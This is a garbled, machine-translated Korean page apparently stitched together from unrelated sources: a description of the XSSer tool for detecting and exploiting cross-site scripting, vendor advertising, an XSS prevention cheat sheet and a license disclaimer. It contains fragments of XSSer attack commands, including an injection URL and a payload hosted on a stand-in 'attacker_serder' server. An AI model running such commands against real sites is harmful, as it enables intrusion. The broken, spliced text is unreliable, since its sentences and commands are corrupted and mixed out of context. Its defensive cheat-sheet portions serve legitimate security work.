아무 일도 일어나지 않는다면 GitHub 데스크탑을 다운로드 하 고 다시 시도 하십시오. . 이 프레임 워크는 적극적으로 새로운 스폰서와 자금을 찾고 있습니다. 귀하 또는 귀하의 조직이 XSSer을 유지 하는 것에 관심이 있는 경우, 직접 연락 하십시오. 코드 약점을 해결 하 고 어려움을 겪고 계십니까? Veracode에서 지식이 풍부한 컨설턴트는 당신을 도울 수 있습니다. 크로스 사이트 “스 크립 터” (일명 XSSer)는 웹 기반 애플리케이션의 XSS 취약점을 탐지, 악용 및 보고 하는 자동 프레임 워크입니다. * 추론을 사용 하 여 필터링 된 매개 변수를 검색 합니다. * GET을 사용 하 여 URL에서 간단한 주입, 쿠키에 주입, DOM 섀도 공간을 사용 하려고 (서버 로깅 없음!) 그리고 어떤 취약점이 존재 하는 경우, 자신의 최종 코드를 이용 하 여: xsser-u는 http://host.com?를 입력 하십시오. 여기에 주입 코드! “* 자동 fuzzing을 사용 하 여 발견 된 페이로드에서” 자신의 “원격 코드를 이용 하 여: http://host.com”/경로?는 URL에서 POST로 간단 하 게 삽입 하는 것을 “자동으로” https://attacker_serder/경로/코드. 매개 변수 (예: 암호)를 사용 하 여 통계 결과를 제공 합니다.
“http://host.com/index.php” 대상 = 로그인 & 사용자 = 관리자 암호 = XSS 프레임 워크 V 6.2 미러: 구글 드라이브 SHA256 : 68096d574aacf51cea46708d473d5c6b13d3b5039c8f3587d2325c9bdefdcbc1 이전 버전: OWASP 프로젝트 페이지 Veracode 여러 테스트 및 보안 분석 서비스를 제공 하 여 사이트 간 스크립팅 결함 완화: Veracode 테스트 방법론 사이트 간 스크립팅. 개발자를 위한 궁극적 인 XSS 보호 치트 시트는 다양 한 조직, 연구자, 웹 사이트 및 우리의 자신의 경험에서 XSS 보호에 사용할 수 있는 정보의 편집 이다. 이 문서는 간단한 언어를 따르고 개발자가 올바른 XSS 방어를 구현 하 고 XSS 취약점을 방지 하 고 XSS 공격을 게시 하는 보안 웹 응용 프로그램을 빌드하는 데 도움이 되는 설명을 정당화 합니다. 또한 XSS 취약점을 완화 하기 위해 다양 한 프로그래밍 언어에서 제공 하는 기존 메서드나 기능에 대해 설명 합니다. 이 문서는 XSS 보호의 도메인에 업데이트 되 고 정확한 정보를 포함 하기 위해 정기적으로 업데이트 됩니다. 검색 필드를 포함 하는 사이트에 적절 한 입력을 소독 하지 않습니다. 다음과 같은 검색 쿼리를 만들어: 대상 페이지 javascripts (포함 및 연결)을 분석 하 여 일반적인 싱크 및 소스를 검색 합니다. ISSA 저널에서 Xenotix XSS 익스플로잇 프레임 워크에 관한 기사 모든 동영상은 YouTube 재생 목록에서 사용할 수 있습니다. 본 소프트웨어는 “있는 그대로” 제공 되며, 저자는 상품성 및 적합성에 대 한 모든 묵시적 보증을 포함 하 여이 소프트웨어와 관련 된 모든 보증을 부인 합니다.